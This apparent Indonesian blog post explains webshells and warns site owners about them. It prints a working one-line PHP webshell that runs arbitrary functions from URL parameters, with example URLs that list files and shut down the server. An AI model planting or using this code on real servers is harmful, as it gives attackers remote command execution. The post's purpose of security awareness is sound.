PHP shell code paling pendek

PHP shell code paling pendek

Dalam dunia pembuatan Web, security adalah hal penting yang kamu harus perhatikan, karena kesalahan kecil dapat menyebabkan fatal pada web kamu, banyak orang membuat web dengan tampilan yang sangat bagus tapi tidak demikian dengan security atau keamanan nya yang buruk kejadian seperti ini yang membuat banyak web kena hack, kalau sudah terhack biasanya nanti web kamu dikasih webshell, apa sih webshell ini ? webshell adalah code yang dibuat untuk mengontrol server. Beberapa webshell yang terkenal antara lain shell bejak, c99 dan r57. Code webshell ini bisa melakukan edit, upload, delete dan bahkan bisa menjalankan command prompt di windows atau command bash linux. Oleh sebab itu hati-hatilah ketika membuat web agar web kamu tidak mudah di-hack oleh orang lain.

Berikut adalah php shell code yang pendek sekali namun mematikan, perhatikan code dibawah ini dan save lah dengan nama sampel.php

<?php $_GET['a']($_GET['b']); ?>

Sekilas tidak ada yang aneh dan mencurigakan dengan kode tersebut namun dibalik keluguannya sepotong code di atas berakibat fatal jika dieksekusi di-browser seperti ini http://localhost/sample.php?a=system&b=dir

secara langsung format url yang dijalankan dibrowser meng-eksekusi perintah system("dir") yang memrintahkan untuk menampilkan list file di directory file sample.php dijalankan. apa jadinya jika kita eksekusi url tadi di-browser seperti ini http://localhost/sample.php?a=system&b=shutdown -s -t 7200   hal yang terjadi server akan di-shutdown dalam waktu 7200 detik alias 2 jam, tidak percaya mari kita buktikan pada screenshoot dibawah ini

luar biasa bukan potongan code yang pendek namun jika diaplikasikan oleh orang yang tidak bertanggung jawab efek-nya tidak main-main bisa men-shutdown komputer webserver. Jadi jika kamu menemukan kode diatas pada web kamu cepat-cepatlah dihapus karena kode php diatas adalah serigala berbulu domba :D.


Posted on